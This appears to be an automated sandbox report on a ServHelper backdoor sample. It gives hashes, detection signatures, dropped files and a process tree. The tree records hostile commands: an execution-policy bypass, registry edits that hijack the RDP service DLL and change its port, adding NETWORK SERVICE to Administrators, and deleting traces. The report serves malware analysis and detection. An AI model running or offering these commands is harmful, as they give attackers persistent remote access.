Analysis
  max time kernel: 84s
  max time network: 149s
  platform: windows10_x64
  resource: win10-en
  submitted: 14-09-2021 13:23
Static task: static1

Behavioral task: behavioral1
  Sample: 608b93e344bd3dbb09d0af9da6856061.exe
  Resource: win7-en
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 608b93e344bd3dbb09d0af9da6856061.exe
  Resource: win10-en
  0 signatures, 0 seconds
General
  Target: 608b93e344bd3dbb09d0af9da6856061.exe
  Size: 4.0MB
  MD5: 608b93e344bd3dbb09d0af9da6856061
  SHA1: b7c8bd7bace350d3c9c054ebb58f25535d22ee95
  SHA256: 5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4
  SHA512: 6e47bb4688737505af62a8c67cea4143185dc047340d8943d412b5274b229bd24628a31576a3250cdfb69b0b4fcfd74140fe83355f49527e7cf9f465c30ac131
  Score: 10/10
Malware Config

Signatures

- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.

- Modifies RDP port number used by Windows (1 TTPs)

- Sets DLL path for service in the registry (2 TTPs)

- Drops file in System32 directory (1 IoCs)
  description                    ioc                                   Process
  File created                   C:\Windows\SysWOW64\rdpclip.exe       powershell.exe

- Drops file in Windows directory (8 IoCs)
  description                    ioc                                   Process
  File created                   C:\Windows\branding\wupsvc.jpg        powershell.exe
  File opened for modification   C:\Windows\branding\Basebrd           powershell.exe
  File opened for modification   C:\Windows\branding\ShellBrd          powershell.exe
  File opened for modification   C:\Windows\branding\mediasrv.png      powershell.exe
  File opened for modification   C:\Windows\branding\mediasvc.png      powershell.exe
  File opened for modification   C:\Windows\branding\wupsvc.jpg        powershell.exe
  File created                   C:\Windows\branding\mediasrv.png      powershell.exe
  File created                   C:\Windows\branding\mediasvc.png      powershell.exe

- Modifies registry key (1 TTPs, 1 IoCs)
  pid    Process
  3904   reg.exe

- Runs net.exe

- Suspicious behavior: EnumeratesProcesses (15 IoCs)
  pid    Process
  3644   powershell.exe
  3644   powershell.exe
  3644   powershell.exe
  3880   powershell.exe
  3880   powershell.exe
  3880   powershell.exe
  2004   powershell.exe
  2004   powershell.exe
  2004   powershell.exe
  496    powershell.exe
  496    powershell.exe
  496    powershell.exe
  3644   powershell.exe
  3644   powershell.exe
  3644   powershell.exe

- Suspicious behavior: LoadsDriver (1 IoCs)
  pid    Process
  620    Process not Found

- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description               pid    Process
  Token: SeDebugPrivilege   3644   powershell.exe
  Token: SeDebugPrivilege   3880   powershell.exe
  Token: SeDebugPrivilege   2004   powershell.exe
  Token: SeDebugPrivilege   496    powershell.exe

- Suspicious use of WriteProcessMemory (63 IoCs)
Processes

C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"
  PID: 1612
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    PID: 3644
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pgf2ogpo\pgf2ogpo.cmdline"
      PID: 3780
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES555.tmp" "c:\Users\Admin\AppData\Local\Temp\pgf2ogpo\CSC7C53E3D0A2E74C089B16F1D5B1486D26.TMP"
        PID: 1644

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 3880
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 2004
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 496
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      PID: 2312

    C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      PID: 3904
      - Modifies registry key

    C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      PID: 2552

    C:\Windows\SysWOW64\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      PID: 1908
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID: 3652

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      PID: 2496
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c net start rdpdr
        PID: 2620
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\net.exe
          Command line: net start rdpdr
          PID: 3880
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
            PID: 2892

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      PID: 3120
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c net start TermService
        PID: 4024
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\net.exe
          Command line: net start TermService
          PID: 4028
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
            PID: 3328

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      PID: 1688

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      PID: 1828